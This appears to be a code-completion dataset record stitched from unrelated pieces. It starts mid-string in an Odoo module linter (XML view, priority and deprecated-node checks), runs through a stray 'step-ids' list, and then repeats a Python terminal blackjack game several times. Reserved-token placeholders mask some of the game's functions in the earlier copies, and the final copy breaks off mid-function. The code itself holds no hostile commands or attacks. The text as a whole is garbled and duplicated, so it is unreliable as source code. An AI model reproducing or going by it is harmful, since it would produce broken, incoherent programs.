should be field=\"user_id\" too\n if ir_filter_fields and len(ir_filter_fields) == 1:\n # TODO: Add a list of msg_args before of return\n # TODO: Add source lineno in all xml checks\n self.msg_args = (\n \"%s:%d\" % (xml_file, ir_filter_record.sourceline),\n ir_filter_record.get('id'),)\n return False\n return True\n\n @staticmethod\n def _get_priority(view):\n try:\n priority_node = view.xpath(\"field[@name='priority'][1]\")[0]\n return int(priority_node.get('eval', priority_node.text) or 0)\n except (IndexError, ValueError):\n # IndexError: If the field is not found\n # ValueError: If the value found is not valid integer\n pass\n return 0\n\n @staticmethod\n def _is_replaced_field(view):\n try:\n arch = view.xpath(\"field[@name='arch' and @type='xml'][1]\")[0]\n except IndexError:\n return None\n replaces = \\\n arch.xpath(\".//field[@name='name' and @position='replace'][1]\") + \\\n arch.xpath(\".//xpath[@position='replace'][1]\")\n return bool(replaces)\n\n def _check_dangerous_view_replace_wo_priority(self):\n \"\"\"Check dangerous view defined with low priority\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n views = self.get_xml_records(\n os.path.join(self.module_path, xml_file), model='ir.ui.view')\n for view in views:\n priority = self._get_priority(view)\n is_replaced_field = self._is_replaced_field(view)\n if is_replaced_field and priority < self.config.min_priority:\n self.msg_args.append((\n \"%s:%s\" % (xml_file, view.sourceline), priority,\n self.config.min_priority))\n if self.msg_args:\n return False\n return True\n\n def _check_create_user_wo_reset_password(self):\n \"\"\"Check xml records of user without the context\n 'context=\"{'no_reset_password': True}\"'\n This context avoid send email and mail log warning\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n 
xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n user_records = self.get_xml_records(\n os.path.join(self.module_path, xml_file), model='res.users')\n # if exists field=\"name\" then is a new record\n # then should be context\n self.msg_args.extend([\n (\"%s:%s\" % (xml_file, user_record.sourceline))\n for user_record in user_records\n if user_record.xpath(\"field[@name='name']\") and\n 'no_reset_password' not in (user_record.get('context') or '')])\n if self.msg_args:\n return False\n return True\n\n def _check_javascript_lint(self):\n \"\"\"Check javascript lint\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for js_file_rel in self.filter_files_ext('js', relpath=True):\n js_file = os.path.join(self.module_path, js_file_rel)\n errors = self.check_js_lint(js_file, self.config.jslintrc)\n for error in errors:\n self.msg_args.append((js_file_rel + error,))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_data_xml_node(self):\n \"\"\"Check deprecated <data> xml node inside <odoo> xml node\n :return: False if found <data> xml node inside <odoo> xml node\"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n odoo_nodes = doc.xpath(\"/odoo\") \\\n if not isinstance(doc, string_types) else []\n children, data_node = ((odoo_nodes[0].getchildren(),\n odoo_nodes[0].findall('data'))\n if odoo_nodes else ([], []))\n if len(children) == 1 and len(data_node) == 1:\n lineno = odoo_nodes[0].sourceline\n self.msg_args.append((\"%s:%s\" % (xml_file, lineno)))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_openerp_xml_node(self):\n \"\"\"Check deprecated <openerp> xml node\n :return: False if exists <openerp> node and\n add list of xml files in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for 
xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n openerp_nodes = doc.xpath(\"/openerp\") \\\n if not isinstance(doc, string_types) else []\n if openerp_nodes:\n lineno = openerp_nodes[0].sourceline\n self.msg_args.append((\"%s:%s\" % (xml_file, lineno)))\n if self.msg_args:\n return False\n return True\n\n def _check_wrong_tabs_instead_of_spaces(self):\n \"\"\"Check wrong tabs character instead of four spaces.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n countline = 0\n with open(ext_file, 'rb') as fp:\n for line in fp:\n countline += 1\n line_space_trip = line.lstrip(b' ')\n if line_space_trip != line_space_trip.lstrip(b'\\t'):\n self.msg_args.append(\n (\"%s:%d\" % (ext_file_rel, countline)))\n if self.msg_args:\n return False\n return True\n\n def _check_missing_newline_extrafiles(self):\n \"\"\"Check missing newline in other ext files (.xml, .csv, .po)\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n last_line = ''\n # NOTE: SEEK_END just is supported with 'rb' mode for py3\n with open(ext_file, 'rb') as fp:\n if os.stat(ext_file).st_size > 1:\n fp.seek(-2, os.SEEK_END)\n last_line = fp.readline()\n if not (last_line.endswith(b'\\n') or\n last_line.endswith(b'\\r')):\n self.msg_args.append((ext_file_rel,))\n if self.msg_args:\n return False\n return True\n\n def _get_manifest_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in self.manifest_dict.get(data_type) or []:\n referenced_files[fname] = 
data_type\n return referenced_files\n\n def _get_xml_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in self.manifest_dict.get(data_type) or []:\n if not fname.endswith('.xml'):\n continue\n referenced_files.update(\n self._get_xml_referenced_files_report(fname, data_type)\n )\n return referenced_files\n\n def _get_xml_referenced_files_report(self, fname, data_type):\n return {\n # those files are relative to the addon path\n os.path.join(\n *record.attrib[attribute].split(os.sep)[1:]\n ): data_type\n for attribute in ['xml', 'xsl']\n for record in self.parse_xml(\n os.path.join(self.module_path, fname)\n )\n .xpath('//report[@%s]' % attribute)\n }\n\n def _get_module_files(self):\n module_files = []\n for type_file in self.config.extfiles_convert:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n module_files.append(ext_file_rel)\n return module_files\n\n def _check_file_not_used(self):\n \"\"\"Check if a file is not used from manifest\"\"\"\n module_files = set(self._get_module_files())\n referenced_files = set(self._get_manifest_referenced_files()).union(\n set(self._get_xml_referenced_files())\n )\n excluded_dirs = ['static', 'test', 'tests', 'migrations']\n no_referenced_files = [\n f for f in (module_files - referenced_files)\n if f.split(os.path.sep)[0] not in excluded_dirs\n ]\n self.msg_args = no_referenced_files\n return not no_referenced_files\n\n def _check_xml_attribute_translatable(self):\n \"\"\"The xml attribute is missing the translation=\"off\" tag\n Example <attribute name=\"groups\">sale.group</attribute>\n \"\"\"\n if (self.linter._all_options['valid_odoo_versions'].config\n .valid_odoo_versions != ['8.0']):\n return True\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(\n os.path.join(self.module_path, xml_file), None,\n '//attribute[not(@name=\"string\") and not(@translation)]'):\n 
self.msg_args.append(\n (\"%s:%d\" % (xml_file, record.sourceline), 'xml_id'))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_tree_attribute(self):\n \"\"\"The tree-view declaration is using a deprecated attribute.\n Example <tree string=\"Partners\"></tree>\n \"\"\"\n checks = [\n {\n 'attr': 'colors',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0', '8.0'},\n 'xpath': './/tree[@colors]',\n },\n {\n 'attr': 'fonts',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0', '8.0'},\n 'xpath': './/tree[@fonts]',\n },\n {\n 'attr': 'string',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'},\n 'xpath': './/tree[@string]',\n },\n ]\n valid_versions = set(\n self.linter._all_options['valid_odoo_versions'].config\n .valid_odoo_versions)\n\n applicable_checks = [check for check in checks if (\n check['attr'] in self.config.deprecated_tree_attributes and\n bool(valid_versions - check['skip_versions']))]\n\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(\n os.path.join(self.module_path, xml_file),\n model='ir.ui.view'):\n\n for check in applicable_checks:\n if record.xpath(check['xpath']):\n self.msg_args.append((\n '%s:%d' % (xml_file, record.sourceline),\n check['attr']))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_qweb_directive(self):\n \"\"\"Check for use of deprecated QWeb directives t-*-options.\n :return: False if deprecated directives are found, in which case\n self.msg_args will contain the error messages.\n \"\"\"\n valid_versions = set(self.linter._all_options[\n 'valid_odoo_versions'].config.valid_odoo_versions)\n if not valid_versions & {'10.0', '11.0'}:\n return True\n\n deprecated_directives = {\n 't-esc-options',\n 't-field-options',\n 't-raw-options',\n }\n directive_attrs = '|'.join('@%s' % d for d in deprecated_directives)\n xpath = '|'.join(\n '/%s//template//*[%s]' % (tag, directive_attrs)\n for tag in 
('odoo', 'openerp')\n )\n\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=False):\n doc = self.parse_xml(xml_file)\n if isinstance(doc, string_types):\n continue\n for node in doc.xpath(xpath):\n # Find which directive was used exactly.\n directive = next(\n iter(set(node.attrib) & deprecated_directives))\n self.msg_args.append((\n '%s:%d' % (xml_file, node.sourceline), directive))\n return not bool(self.msg_args)\n",
"step-ids": [
24,
28,
33,
42,
46
]
}
|
[
24,
28,
33,
42,
46
] |
<|reserved_special_token_0|>
def create_players(num):
players_list = []
for i in range(num):
name = input(f'Player {i + 1}, what is your name? ')
while name == '':
name = input('Please enter your name: ')
players_list.append(people.Player(name, 1000))
print(
'\nAll players will begin the game with the same amount of $1,000 dollars.\n'
)
return players_list
<|reserved_special_token_0|>
def view_hands(players):
print('Here are the hands for each player: \n')
for p in players:
if isinstance(p, people.Dealer):
print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')
print()
elif not p.check_broke():
print(f'{p.name}: {p.hand}', end='')
if p.check_blackjack():
print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')
else:
print()
print()
def do_decision(player, dealer, hand_index=0):
choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}
valid_choice = False
while not valid_choice:
choice = input(
f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '
)
while choice.lower() not in choices_dict.keys():
choice = input(
"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: "
)
valid_choice = choices_dict.get(choice)(player, dealer, hand_index)
<|reserved_special_token_0|>
def split(player, dealer, hand_index=0):
if player.hand[hand_index][0] != player.hand[hand_index][1]:
print(
"You can't split on that hand! You need two identical cards to split. Choose again."
)
return False
elif player.bet * 2 > player.money:
print(
f"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]
player.hand = hands
print('Now you will play each hand separately: \n')
for i in range(0, 2):
print(f'For Hand #{i + 1}: ')
do_decision(player, dealer, i)
return True
<|reserved_special_token_0|>
def reset(players):
dealer = players[-1]
for player in players:
dealer.retrieve_cards(player)
player.bet = 0
def display_accounts(players):
for player in players[:-1]:
change = player.money - player.initial_money
word = 'gain'
if change < 0:
word = 'loss'
print(
f""" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}
"""
)
sys.stdout.flush()
time.sleep(0.5)
def disp_str_slow(phrase, t):
for i in phrase:
print(i, end='')
sys.stdout.flush()
time.sleep(t)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def display_instructions():
print(
"""
Instructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 """
)
print(
'as possible without going over. The numbered cards have the value of their number, face cards have '
)
print(
"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\n"
)
print(
'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '
)
print(
"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the "
)
print(
"""dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down:
"""
)
print(
" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many "
)
print(
' times as wanted, up until the player busts (goes over 21). \n'
)
print(
" Stand: To 'stand' means to stay with the current cards. \n"
)
print(
" Split: A player can 'split' only when the first two cards of his or her hand are the "
)
print(
' same. When this occurs, the player makes two separate piles, one with each '
)
print(
' identical card, and places a bet identical to the initial bet for the second '
)
print(
""" pile. Then, the player can hit or stand with each pile as in a normal round.
"""
)
print(
" Double Down: When a player chooses to 'double down', he or she can increase the current bet "
)
print(
""" by 100% in exchange for agreeing to stand after being dealt one more card.
"""
)
input('Ready to play? Hit any key to continue: ')
print()
def get_num_players():
num = input('How many people will be playing (up to 7)? Enter a number: ')
while not num.isdigit() or int(num) < 1 or int(num) > 7:
num = input('Please enter a number from 1 to 7: ')
print(
"""
Great! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).
"""
)
time.sleep(1)
return int(num)
def create_players(num):
players_list = []
for i in range(num):
name = input(f'Player {i + 1}, what is your name? ')
while name == '':
name = input('Please enter your name: ')
players_list.append(people.Player(name, 1000))
print(
'\nAll players will begin the game with the same amount of $1,000 dollars.\n'
)
return players_list
def deal(dealer, players):
for player in players[:-1]:
if not player.check_broke():
dealer.deal_card(player)
dealer.deal_card(players[-1])
def place_bets(players):
print('Now, each of you must place your bets.\n')
bets = []
for player in players[:-1]:
if not player.check_broke():
bet = input(f'Bet for {player.name}: ')
while not bet.isdigit() or int(bet) > player.money:
msg = 'Please enter a whole number: '
if bet.isdigit():
msg = (
"You don't have enough money! Enter a different value: "
)
bet = input(msg)
player.bet = int(bet)
print()
def view_hands(players):
print('Here are the hands for each player: \n')
for p in players:
if isinstance(p, people.Dealer):
print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')
print()
elif not p.check_broke():
print(f'{p.name}: {p.hand}', end='')
if p.check_blackjack():
print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')
else:
print()
print()
def do_decision(player, dealer, hand_index=0):
choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}
valid_choice = False
while not valid_choice:
choice = input(
f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '
)
while choice.lower() not in choices_dict.keys():
choice = input(
"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: "
)
valid_choice = choices_dict.get(choice)(player, dealer, hand_index)
def cycle_decisions(players):
dealer = players[-1]
for p in players:
if isinstance(p, people.Dealer):
print(
f"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11)."
)
sys.stdout.flush()
time.sleep(0.8)
if not check_status(p) and not p.check_hard_17():
hit(p, dealer)
sys.stdout.flush()
time.sleep(0.5)
disp_str_slow('\nEnd-of-Round Earnings: \n', 0.05)
if p.check_bust():
for i in players[:-1]:
if not i.check_broke():
sys.stdout.flush()
time.sleep(0.5)
print(' ', end='')
for j in range(0, len(i.hand)):
if not i.check_bust(j):
print(f'{i.name} wins ${i.bet}! ', end='')
i.money += i.bet
else:
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
i.chips = chip.convert_to_chips(i.money)
if i.check_broke():
print(
f"Sorry {i.name}, but you're out of money and can no longer play in this game"
)
else:
print(
f'Current Balance: ${i.money} (Chips: {i.chips})'
)
else:
for i in players[:-1]:
if not i.check_broke():
sys.stdout.flush()
time.sleep(0.5)
print(' ', end='')
for j in range(0, len(i.hand)):
if not i.check_bust(j):
if i.hand_value(j) > p.hand_value():
print(f'{i.name} wins ${i.bet}! ', end='')
i.money += i.bet
elif i.hand_value(j) < p.hand_value():
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
else:
print(
f'{i.name} tied with the {p.name}! No change. '
, end='')
else:
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
i.chips = chip.convert_to_chips(i.money)
if i.check_broke():
print(
f"Sorry {i.name}, but you're out of money and can no longer play in this game"
)
else:
print(
f'Current Balance: ${i.money} (Chips: {i.chips})'
)
sys.stdout.flush()
time.sleep(0.5)
elif not p.check_blackjack() and not p.check_broke():
do_decision(p, dealer)
def stand(player, dealer, hand_index=0):
print(f'{player.name} stands.\n')
return True
def hit(player, dealer, hand_index=0):
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
if isinstance(player, people.Dealer):
while not player.check_hard_17() and not done:
time.sleep(0.5)
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
else:
choice = ''
if not done:
choice = input("Do you want to hit again ('y' or 'n')? ").lower()
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
while choice == 'y' and not done:
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
if not done:
choice = input("Do you want to hit again ('y' or 'n')? "
).lower()
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
if not done:
print()
return True
def split(player, dealer, hand_index=0):
if player.hand[hand_index][0] != player.hand[hand_index][1]:
print(
"You can't split on that hand! You need two identical cards to split. Choose again."
)
return False
elif player.bet * 2 > player.money:
print(
f"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]
player.hand = hands
print('Now you will play each hand separately: \n')
for i in range(0, 2):
print(f'For Hand #{i + 1}: ')
do_decision(player, dealer, i)
return True
def double_down(player, dealer, hand_index=0):
if player.bet * 2 > player.money:
print(
f"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
elif player.did_double_down:
print('You can double down only once! Choose a different option.')
return False
player.bet *= 2
player.did_double_down = True
print(f'Bet increased to ${player.bet}!.')
do_decision(player, dealer, hand_index)
return True
def check_status(player, hand_index=0):
done = False
hand_string = '['
for card in player.hand[hand_index][:-1]:
hand_string += card.__str__() + ', '
print(f'Current Hand: {hand_string}', end='')
sys.stdout.flush()
time.sleep(0.5)
disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)
time.sleep(0.5)
if player.check_blackjack(hand_index):
disp_str_slow(' ==> BLACKJACK!!! ', 0.05)
if not isinstance(player, people.Dealer):
disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)
print('\n\n', end='')
done = True
sys.stdout.flush()
time.sleep(0.5)
elif player.check_bust(hand_index):
disp_str_slow(' ==> BUST! ', 0.05)
if not isinstance(player, people.Dealer):
disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)
print('\n\n', end='')
done = True
sys.stdout.flush()
time.sleep(0.5)
else:
print()
return done
def play_again(players):
print()
all_broke = True
for i in players:
if not i.check_broke():
all_broke = False
if not all_broke:
choice = input(
"Do you all want to play another round? Enter 'y' or 'n': ").lower(
)
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
print()
return choice
else:
print()
return 'n'
def reset(players):
dealer = players[-1]
for player in players:
dealer.retrieve_cards(player)
player.bet = 0
def display_accounts(players):
for player in players[:-1]:
change = player.money - player.initial_money
word = 'gain'
if change < 0:
word = 'loss'
print(
f""" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}
"""
)
sys.stdout.flush()
time.sleep(0.5)
def disp_str_slow(phrase, t):
for i in phrase:
print(i, end='')
sys.stdout.flush()
time.sleep(t)
def print_players(players):
for player in players:
print(player)
def main():
display_instructions()
num_players = get_num_players()
players = create_players(num_players)
dealer = people.Dealer(Deck(6))
players.append(dealer)
replay_choice = 'y'
while replay_choice == 'y':
reset(players)
place_bets(players)
for i in range(0, 2):
deal(dealer, players)
view_hands(players)
cycle_decisions(players)
replay_choice = play_again(players)
print(
"""------------------------------------------------------------------------------------------------
"""
)
disp_str_slow('FINAL PLAYER ACCOUNTS\n\n', 0.05)
sys.stdout.flush()
time.sleep(0.5)
display_accounts(players)
sys.stdout.flush()
time.sleep(0.2)
print(
"""------------------------------------------------------------------------------------------------
"""
)
print('Goodbye!')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def display_instructions():
print(
"""
Instructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 """
)
print(
'as possible without going over. The numbered cards have the value of their number, face cards have '
)
print(
"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\n"
)
print(
'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '
)
print(
"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the "
)
print(
"""dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down:
"""
)
print(
" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many "
)
print(
' times as wanted, up until the player busts (goes over 21). \n'
)
print(
" Stand: To 'stand' means to stay with the current cards. \n"
)
print(
" Split: A player can 'split' only when the first two cards of his or her hand are the "
)
print(
' same. When this occurs, the player makes two separate piles, one with each '
)
print(
' identical card, and places a bet identical to the initial bet for the second '
)
print(
""" pile. Then, the player can hit or stand with each pile as in a normal round.
"""
)
print(
" Double Down: When a player chooses to 'double down', he or she can increase the current bet "
)
print(
""" by 100% in exchange for agreeing to stand after being dealt one more card.
"""
)
input('Ready to play? Hit any key to continue: ')
print()
def get_num_players():
num = input('How many people will be playing (up to 7)? Enter a number: ')
while not num.isdigit() or int(num) < 1 or int(num) > 7:
num = input('Please enter a number from 1 to 7: ')
print(
"""
Great! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).
"""
)
time.sleep(1)
return int(num)
def create_players(num):
players_list = []
for i in range(num):
name = input(f'Player {i + 1}, what is your name? ')
while name == '':
name = input('Please enter your name: ')
players_list.append(people.Player(name, 1000))
print(
'\nAll players will begin the game with the same amount of $1,000 dollars.\n'
)
return players_list
def deal(dealer, players):
for player in players[:-1]:
if not player.check_broke():
dealer.deal_card(player)
dealer.deal_card(players[-1])
def place_bets(players):
print('Now, each of you must place your bets.\n')
bets = []
for player in players[:-1]:
if not player.check_broke():
bet = input(f'Bet for {player.name}: ')
while not bet.isdigit() or int(bet) > player.money:
msg = 'Please enter a whole number: '
if bet.isdigit():
msg = (
"You don't have enough money! Enter a different value: "
)
bet = input(msg)
player.bet = int(bet)
print()
def view_hands(players):
print('Here are the hands for each player: \n')
for p in players:
if isinstance(p, people.Dealer):
print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')
print()
elif not p.check_broke():
print(f'{p.name}: {p.hand}', end='')
if p.check_blackjack():
print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')
else:
print()
print()
def do_decision(player, dealer, hand_index=0):
choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}
valid_choice = False
while not valid_choice:
choice = input(
f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '
)
while choice.lower() not in choices_dict.keys():
choice = input(
"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: "
)
valid_choice = choices_dict.get(choice)(player, dealer, hand_index)
def cycle_decisions(players):
dealer = players[-1]
for p in players:
if isinstance(p, people.Dealer):
print(
f"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11)."
)
sys.stdout.flush()
time.sleep(0.8)
if not check_status(p) and not p.check_hard_17():
hit(p, dealer)
sys.stdout.flush()
time.sleep(0.5)
disp_str_slow('\nEnd-of-Round Earnings: \n', 0.05)
if p.check_bust():
for i in players[:-1]:
if not i.check_broke():
sys.stdout.flush()
time.sleep(0.5)
print(' ', end='')
for j in range(0, len(i.hand)):
if not i.check_bust(j):
print(f'{i.name} wins ${i.bet}! ', end='')
i.money += i.bet
else:
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
i.chips = chip.convert_to_chips(i.money)
if i.check_broke():
print(
f"Sorry {i.name}, but you're out of money and can no longer play in this game"
)
else:
print(
f'Current Balance: ${i.money} (Chips: {i.chips})'
)
else:
for i in players[:-1]:
if not i.check_broke():
sys.stdout.flush()
time.sleep(0.5)
print(' ', end='')
for j in range(0, len(i.hand)):
if not i.check_bust(j):
if i.hand_value(j) > p.hand_value():
print(f'{i.name} wins ${i.bet}! ', end='')
i.money += i.bet
elif i.hand_value(j) < p.hand_value():
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
else:
print(
f'{i.name} tied with the {p.name}! No change. '
, end='')
else:
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
i.chips = chip.convert_to_chips(i.money)
if i.check_broke():
print(
f"Sorry {i.name}, but you're out of money and can no longer play in this game"
)
else:
print(
f'Current Balance: ${i.money} (Chips: {i.chips})'
)
sys.stdout.flush()
time.sleep(0.5)
elif not p.check_blackjack() and not p.check_broke():
do_decision(p, dealer)
def stand(player, dealer, hand_index=0):
print(f'{player.name} stands.\n')
return True
def hit(player, dealer, hand_index=0):
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
if isinstance(player, people.Dealer):
while not player.check_hard_17() and not done:
time.sleep(0.5)
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
else:
choice = ''
if not done:
choice = input("Do you want to hit again ('y' or 'n')? ").lower()
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
while choice == 'y' and not done:
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
if not done:
choice = input("Do you want to hit again ('y' or 'n')? "
).lower()
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
if not done:
print()
return True
def split(player, dealer, hand_index=0):
if player.hand[hand_index][0] != player.hand[hand_index][1]:
print(
"You can't split on that hand! You need two identical cards to split. Choose again."
)
return False
elif player.bet * 2 > player.money:
print(
f"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]
player.hand = hands
print('Now you will play each hand separately: \n')
for i in range(0, 2):
print(f'For Hand #{i + 1}: ')
do_decision(player, dealer, i)
return True
def double_down(player, dealer, hand_index=0):
if player.bet * 2 > player.money:
print(
f"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
elif player.did_double_down:
print('You can double down only once! Choose a different option.')
return False
player.bet *= 2
player.did_double_down = True
print(f'Bet increased to ${player.bet}!.')
do_decision(player, dealer, hand_index)
return True
def check_status(player, hand_index=0):
done = False
hand_string = '['
for card in player.hand[hand_index][:-1]:
hand_string += card.__str__() + ', '
print(f'Current Hand: {hand_string}', end='')
sys.stdout.flush()
time.sleep(0.5)
disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)
time.sleep(0.5)
if player.check_blackjack(hand_index):
disp_str_slow(' ==> BLACKJACK!!! ', 0.05)
if not isinstance(player, people.Dealer):
disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)
print('\n\n', end='')
done = True
sys.stdout.flush()
time.sleep(0.5)
elif player.check_bust(hand_index):
disp_str_slow(' ==> BUST! ', 0.05)
if not isinstance(player, people.Dealer):
disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)
print('\n\n', end='')
done = True
sys.stdout.flush()
time.sleep(0.5)
else:
print()
return done
def play_again(players):
print()
all_broke = True
for i in players:
if not i.check_broke():
all_broke = False
if not all_broke:
choice = input(
"Do you all want to play another round? Enter 'y' or 'n': ").lower(
)
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
print()
return choice
else:
print()
return 'n'
def reset(players):
dealer = players[-1]
for player in players:
dealer.retrieve_cards(player)
player.bet = 0
def display_accounts(players):
for player in players[:-1]:
change = player.money - player.initial_money
word = 'gain'
if change < 0:
word = 'loss'
print(
f""" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}
"""
)
sys.stdout.flush()
time.sleep(0.5)
def disp_str_slow(phrase, t):
for i in phrase:
print(i, end='')
sys.stdout.flush()
time.sleep(t)
def print_players(players):
for player in players:
print(player)
def main():
display_instructions()
num_players = get_num_players()
players = create_players(num_players)
dealer = people.Dealer(Deck(6))
players.append(dealer)
replay_choice = 'y'
while replay_choice == 'y':
reset(players)
place_bets(players)
for i in range(0, 2):
deal(dealer, players)
view_hands(players)
cycle_decisions(players)
replay_choice = play_again(players)
print(
"""------------------------------------------------------------------------------------------------
"""
)
disp_str_slow('FINAL PLAYER ACCOUNTS\n\n', 0.05)
sys.stdout.flush()
time.sleep(0.5)
display_accounts(players)
sys.stdout.flush()
time.sleep(0.2)
print(
"""------------------------------------------------------------------------------------------------
"""
)
print('Goodbye!')
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from card import Card
from deck import Deck
import people
import chip
import sys
import time
def display_instructions():
    """Print the blackjack rules and wait for the user to press a key.

    Output-only helper: explains the goal (hand value close to 21 without
    busting), card values, and the four actions (hit, stand, split,
    double down), then blocks on input() before returning.
    """
    print(
        """
Instructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 """
        )
    print(
        'as possible without going over. The numbered cards have the value of their number, face cards have '
        )
    print(
        "a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\n"
        )
    print(
        'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '
        )
    print(
        "each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the "
        )
    print(
        """dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down: 
"""
        )
    print(
        " Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many "
        )
    print(
        ' times as wanted, up until the player busts (goes over 21). \n'
        )
    print(
        " Stand: To 'stand' means to stay with the current cards. \n"
        )
    print(
        " Split: A player can 'split' only when the first two cards of his or her hand are the "
        )
    print(
        ' same. When this occurs, the player makes two separate piles, one with each '
        )
    print(
        ' identical card, and places a bet identical to the initial bet for the second '
        )
    print(
        """ pile. Then, the player can hit or stand with each pile as in a normal round.
"""
        )
    print(
